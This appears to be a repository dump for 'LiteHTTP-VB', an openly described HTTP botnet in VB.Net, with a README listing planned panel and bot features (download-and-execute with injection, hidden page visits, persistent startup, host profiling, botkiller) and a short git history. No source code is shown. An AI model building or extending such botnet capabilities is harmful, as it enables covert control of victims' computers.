======================: FILES :======================
======================: README CONTENT :======================


░░░░░░░░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░░░░░░░░░
░░░░░░░░▄▀░░░░░░░░░░░░▄░░░░░░░▀▄░░░░░░░
░░░░░░░░█░░▄░░░░▄░░░░░░░░░░░░░░█░░░░░░░
░░░░░░░░█░░░░░░░░░░░░▄█▄▄░░▄░░░█░▄▄▄░░░
░▄▄▄▄▄░░█░░░░░░▀░░░░▀█░░▀▄░░░░░█▀▀░██░░
░██▄▀██▄█░░░▄░░░░░░░██░░░░▀▀▀▀▀░░░░██░░
░░▀██▄▀██░░░░░░░░▀░██▀░░░░░░░░░░░░░▀██░
░░░░▀████░▀░░░░▄░░░██░░░▄█░░░░▄░▄█░░██░
░░░░░░░▀█░░░░▄░░░░░██░░░░▄░░░▄░░▄░░░██░
░░░░░░░▄█▄░░░░░░░░░░░▀▄░░▀▀▀▀▀▀▀▀░░▄▀░░
░░░░░░█▀▀█████████▀▀▀▀████████████▀░░░░
░░░░░░████▀░░███▀░░░░░░▀███░░▀██▀░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░


What is it?
-----------
<b>LiteHTTP-VB</b> is an HTTP botnet that is being programmed in VB.Net, on the .NET 2.0 dependency.

Expected Features
-----------------

<b>Panel</b>
<ul>
<li>Custom coded with a sleek yet maneuverable design</li>
<li>Ability to have more than 1 user</li>
<li>User privileges</li>
<li>Action logs for all users</li>
</ul>

<b>Bot</b>
<ul>
<li>Download & execute (with option to inject if native)</li>
<li>Visit webpage (visible or hidden)</li>
<li>Startup (with persistence)</li>
<li>Information about bot (aka. OS, version, installed location, etc.)</li>
<li>Basic botkiller (nothing fancy)</li>
<li>Update</li>
<li>Uninstall</li>
</ul>

If you have any questions or concerns, you can email me here: zettabit@pedev.pw

Full credit to zettabithf
https://github.com/zettabithf/LiteHTTP====================== GIT HISTORY: ======================
376980d HEAD@{0}: clone: from https://github.com/decay88/LiteHTTP-VB
commit 376980d6e26121b0952cc68cb9199d4c32155c29
Author: HMJ7 <32758426+HMJ7@users.noreply.github.com>
Date:   Sun Feb 18 09:54:55 2018 +0300

    startthread's loop removed + if statment to disable startup

commit 0913b8dd448beb8088f118a46e4894dca14e5a0d
Author: NYAN CAT <32758426+HMJ7@users.noreply.github.com>
Date:   Sat Feb 17 06:44:18 2018 +0300

    Set theme jekyll-theme-hacker

commit fe79f9a6c6e6fc021eac66da5a00e9c4e2b109dd
Author: HMJ7 <32758426+HMJ7@users.noreply.github.com>
Date:   Sat Feb 17 06:12:21 2018 +0300

    README

commit a703b427a43dfb1f219988283923b85fa2008309
Author: HMJ7 <32758426+HMJ7@users.noreply.github.com>
Date:   Sat Feb 17 06:07:00 2018 +0300

    Initial commit
